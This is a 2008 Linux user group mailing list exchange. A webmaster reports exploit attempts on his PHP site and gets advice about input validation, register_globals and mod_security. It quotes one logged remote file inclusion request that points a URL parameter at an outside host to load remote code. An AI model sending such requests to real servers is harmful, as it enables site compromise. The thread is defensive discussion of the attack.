That is a fairly common tactic. 
It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using apache?)
as an extra measure of security if you haven't already.


On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020@yahoo.com> wrote:

Hi,

I am working on a website that gets a lot of exploit attempts.

They mostly look like this:  /index.php?display=http://humano.ya.com/mysons/index.htm?

Our code is set to disregard any value that is not expected. 

I'm wondering if there is a clearing house for reporting this type of stuff.  I have the IP address as reported.... if that is accurate.

Thanks in advance!

Keith




---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss